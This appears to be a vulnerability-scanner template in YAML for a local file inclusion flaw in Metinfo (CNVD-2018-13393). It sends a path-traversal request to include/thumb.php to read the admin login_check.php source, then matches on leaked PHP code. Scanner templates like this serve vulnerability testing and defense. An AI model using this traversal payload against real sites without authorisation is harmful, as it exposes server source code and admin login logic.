34 lines
955 B
YAML
34 lines
955 B
YAML
id: CNVD-2018-13393
|
|
|
|
info:
|
|
name: Metinfo - Local File Inclusion
|
|
author: ritikchaddha
|
|
severity: high
|
|
description: Metinfo is susceptible to local file inclusion.
|
|
reference:
|
|
- https://paper.seebug.org/676/
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
cvss-score: 8.6
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 1
|
|
tags: cnvd2018,cnvd,metinfo,cvnd2018,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
|
|
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<?php"
|
|
- "login_met_cookie($metinfo_admin_name);"
|
|
condition: and
|
|
# digest: 490a00463044022075eb5737f0a3c2a72b820d5d33e14b1bae15ba4b73da47ce6fb5ffa17e16fc53022009e071a56f4803cf5bfc42b982d8e636f10df0520361efb9dc7e3c09880a562e:922c64590222798bb761d5b6d8e72950 |